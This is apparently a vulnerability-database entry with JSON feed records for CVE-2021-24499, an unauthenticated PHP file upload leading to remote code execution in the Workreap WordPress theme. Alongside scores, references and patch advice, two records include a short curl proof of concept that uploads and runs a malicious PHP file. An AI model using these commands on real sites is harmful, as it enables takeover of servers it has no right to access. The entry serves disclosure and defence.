Description
The Workreap WordPress theme before 2.2.2 AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
**Recent assessments:**
Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0
Related
{"id": "AKB:5D1F0063-0535-424F-9AE0-F6F480281FB5", "vendorId": null, "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-24499", "description": "The Workreap WordPress theme before 2.2.2 AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "published": "2021-08-09T00:00:00", "modified": "2021-08-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/I6sadAsrbZ/cve-2021-24499", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24499", "https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb", "https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/"], "cvelist": ["CVE-2021-24499"], "immutableFields": [], "lastseen": "2022-05-06T23:41:52", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0855"]}, {"type": "cve", "idList": ["CVE-2021-24499"]}, {"type": "githubexploit", "idList": ["DAE27094-1C7A-5109-A7EB-13BD9B999C42"]}, {"type": "wpexploit", "idList": ["WPEX-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB"]}], "rev": 4}, "score": {"value": 5.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0855"]}, {"type": "cve", "idList": ["CVE-2021-24499"]}, {"type": "githubexploit", "idList": ["DAE27094-1C7A-5109-A7EB-13BD9B999C42"]}, {"type": "wpexploit", "idList": ["WPEX-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB"]}]}, "exploitation": null, "vulnersScore": 5.6}, "_state": {"wildexploited": 0, "dependencies": 0}, "_internal": {"wildexploited_cvelist": ["CVE-2021-24499"]}, "attackerkb": {"attackerValue": 0, "exploitability": 0}, "wildExploited": true, "wildExploitedCategory": {"News Article or Blog": ""}, "wildExploitedReports": [{"category": "News Article or Blog", "source_url": "https://unit42.paloaltonetworks.com/network-attacks-trends-august-october-2021/", "published": "2022-01-10T16:52:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24499"], "Miscellaneous": ["https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb", "https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/"]}, "tags": [], "mitre_vector": {}, "last_activity": "2022-01-10T16:52:00"}
{"githubexploit": [{"lastseen": "2022-05-09T09:27:15", "description": "# CVE-2021-24499\nMass exploitation of CVE-2021-24499 unauthentic...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-12T12:43:24", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Amentotech Workreap", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24499"], "modified": "2022-05-09T06:49:59", "id": "DAE27094-1C7A-5109-A7EB-13BD9B999C42", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "wpvulndb": [{"lastseen": "2021-09-14T23:13:17", "description": "The theme's AJAX actions `workreap_award_temp_file_uploader` and `workreap_temp_file_uploader` did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.\n\n### PoC\n\n% curl -F 'action=workreap_award_temp_file_uploader' -F award_img=@malicious.php 'http://example.com/wp-admin/admin-ajax.php' {\"type\":\"success\",\"message\":\"File uploaded!\",\"thumbnail\":\"http:\\/\\/example.com\\/wp-content\\/uploads\\/workreap-temp\\/malicious.php\",\"name\":\"malicious.php\",\"size\":\"24.00 B\"} % curl 'http://example.com/wp-content/uploads/workreap-temp/malicious.php' PWNED!\n", "cvss3": {}, "published": "2021-07-02T00:00:00", "type": "wpvulndb", "title": "Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24499"], "modified": "2021-07-11T10:09:21", "id": "WPVDB-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB", "href": "https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:06", "description": "A remote code execution vulnerability exists in WordPress Workreap theme. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-28T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Workreap Theme Remote Code Execution (CVE-2021-24499)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24499"], "modified": "2021-11-28T00:00:00", "id": "CPAI-2021-0855", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-09-14T23:13:17", "description": "The theme's AJAX actions `workreap_award_temp_file_uploader` and `workreap_temp_file_uploader` did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.\n", "cvss3": {}, "published": "2021-07-02T00:00:00", "type": "wpexploit", "title": "Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24499"], "modified": "2021-07-11T10:09:21", "id": "WPEX-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB", "href": "", "sourceData": "% curl -F 'action=workreap_award_temp_file_uploader' -F award_img=@malicious.php 'http://example.com/wp-admin/admin-ajax.php'\r\n{\"type\":\"success\",\"message\":\"File uploaded!\",\"thumbnail\":\"http:\\/\\/example.com\\/wp-content\\/uploads\\/workreap-temp\\/malicious.php\",\"name\":\"malicious.php\",\"size\":\"24.00 B\"}\r\n\r\n% curl 'http://example.com/wp-content/uploads/workreap-temp/malicious.php'\r\nPWNED!", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:55:52", "description": "The Workreap WordPress theme before 2.2.2 AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-09T10:15:00", "type": "cve", "title": "CVE-2021-24499", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24499"], "modified": "2021-09-21T17:10:00", "cpe": [], "id": "CVE-2021-24499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24499", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-01T19:31:37", "description": "Unauthenticated Upload vulnerability leading to Remote Code Execution (RCE) discovered by Harald Eilertsen (Jetpack) in WordPress Workreap premium theme (versions <= 2.2.1).\n\n## Solution\n\n\r\n Update the WordPress Workreap premium theme to the latest available version (at least 2.2.2).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "patchstack", "title": "WordPress Workreap premium theme <= 2.2.1 - Unauthenticated Upload vulnerability leading to Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24499"], "modified": "2021-07-02T00:00:00", "id": "PATCHSTACK:96799EA0C5FA1F563AA31CB3EABCB62E", "href": "https://patchstack.com/database/vulnerability/workreap/wordpress-workreap-premium-theme-2-2-1-unauthenticated-upload-vulnerability-leading-to-remote-code-execution-rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
CVE-2021-24499
